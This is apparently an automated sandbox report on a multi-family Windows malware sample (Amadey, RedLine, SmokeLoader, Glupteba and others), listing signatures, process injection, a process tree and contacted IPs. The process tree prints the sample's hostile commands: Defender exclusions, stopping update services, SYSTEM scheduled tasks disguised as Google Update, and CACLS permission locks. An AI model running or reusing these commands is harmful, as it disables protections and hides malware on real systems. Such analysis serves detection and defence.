Malware Analysis Report

2025-08-05 19:01

Sample ID 231019-q6dwcagc61
Target 18cb64a6705bb82fc1d95dc7bbf9c020.exe
SHA256 40a0bd36b9cb9ad8c3b6ffc377e35d89425633c1f899f2039993e283669fef32
Tags
amadey glupteba redline sectoprat smokeloader 5141679758_99 breha kukish pixelscloud2.0 up3 backdoor dropper evasion infostealer loader persistence rat trojan dcrat microsoft discovery phishing rootkit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

40a0bd36b9cb9ad8c3b6ffc377e35d89425633c1f899f2039993e283669fef32

Threat Level: Known bad

The file 18cb64a6705bb82fc1d95dc7bbf9c020.exe was found to be: Known bad.

Malicious Activity Summary

amadey glupteba redline sectoprat smokeloader 5141679758_99 breha kukish pixelscloud2.0 up3 backdoor dropper evasion infostealer loader persistence rat trojan dcrat microsoft discovery phishing rootkit spyware stealer

Amadey

Glupteba

SectopRAT payload

RedLine payload

Modifies Windows Defender Real-time Protection settings

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

SectopRAT

DcRat

RedLine

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

.NET Reactor proctector

Checks computer location settings

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Windows security modification

Adds Run key to start application

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Detected potential entity reuse from brand microsoft.

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-19 13:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-19 13:52

Reported

2023-10-19 13:54

Platform

win7-20230831-en

Max time kernel

26s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe"

Signatures

Amadey

trojan amadey

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\A65D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2260 set thread context of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2260 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\SysWOW64\WerFault.exe
PID 2260 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\SysWOW64\WerFault.exe
PID 2260 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\SysWOW64\WerFault.exe
PID 2260 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe C:\Windows\SysWOW64\WerFault.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2636 N/A N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe
PID 1260 wrote to memory of 2516 N/A N/A C:\Users\Admin\AppData\Local\Temp\A729.exe
PID 1260 wrote to memory of 2516 N/A N/A C:\Users\Admin\AppData\Local\Temp\A729.exe
PID 1260 wrote to memory of 2516 N/A N/A C:\Users\Admin\AppData\Local\Temp\A729.exe
PID 1260 wrote to memory of 2516 N/A N/A C:\Users\Admin\AppData\Local\Temp\A729.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 2636 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\A65D.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe
PID 1260 wrote to memory of 2588 N/A N/A C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2588 N/A N/A C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2588 N/A N/A C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 2684 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe
PID 1260 wrote to memory of 536 N/A N/A C:\Users\Admin\AppData\Local\Temp\A96C.exe
PID 1260 wrote to memory of 536 N/A N/A C:\Users\Admin\AppData\Local\Temp\A96C.exe
PID 1260 wrote to memory of 536 N/A N/A C:\Users\Admin\AppData\Local\Temp\A96C.exe
PID 1260 wrote to memory of 536 N/A N/A C:\Users\Admin\AppData\Local\Temp\A96C.exe
PID 1260 wrote to memory of 2908 N/A N/A C:\Users\Admin\AppData\Local\Temp\AA38.exe
PID 1260 wrote to memory of 2908 N/A N/A C:\Users\Admin\AppData\Local\Temp\AA38.exe
PID 1260 wrote to memory of 2908 N/A N/A C:\Users\Admin\AppData\Local\Temp\AA38.exe
PID 1260 wrote to memory of 2908 N/A N/A C:\Users\Admin\AppData\Local\Temp\AA38.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 1388 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe
PID 2020 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe

"C:\Users\Admin\AppData\Local\Temp\18cb64a6705bb82fc1d95dc7bbf9c020.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 92

C:\Users\Admin\AppData\Local\Temp\A65D.exe

C:\Users\Admin\AppData\Local\Temp\A65D.exe

C:\Users\Admin\AppData\Local\Temp\A729.exe

C:\Users\Admin\AppData\Local\Temp\A729.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\A862.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe

C:\Users\Admin\AppData\Local\Temp\A96C.exe

C:\Users\Admin\AppData\Local\Temp\A96C.exe

C:\Users\Admin\AppData\Local\Temp\AA38.exe

C:\Users\Admin\AppData\Local\Temp\AA38.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe

C:\Users\Admin\AppData\Local\Temp\AB52.exe

C:\Users\Admin\AppData\Local\Temp\AB52.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1504 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\AE7E.exe

C:\Users\Admin\AppData\Local\Temp\AE7E.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 528

C:\Users\Admin\AppData\Local\Temp\B15C.exe

C:\Users\Admin\AppData\Local\Temp\B15C.exe

C:\Users\Admin\AppData\Local\Temp\B40B.exe

C:\Users\Admin\AppData\Local\Temp\B40B.exe

C:\Users\Admin\AppData\Local\Temp\B988.exe

C:\Users\Admin\AppData\Local\Temp\B988.exe

C:\Users\Admin\AppData\Local\Temp\C3B.exe

C:\Users\Admin\AppData\Local\Temp\C3B.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\1975.exe

C:\Users\Admin\AppData\Local\Temp\1975.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {6A07C263-0CF7-4B82-A89D-77A0A3A940D6} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\34B3.exe

C:\Users\Admin\AppData\Local\Temp\34B3.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1504 CREDAT:275469 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\46FC.exe

C:\Users\Admin\AppData\Local\Temp\46FC.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {56C784EB-60A2-4D03-9E70-7C13A5C18184} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231019135418.log C:\Windows\Logs\CBS\CbsPersist_20231019135418.cab

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.52:80 77.91.68.52 tcp
RU 5.42.92.88:80 5.42.92.88 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
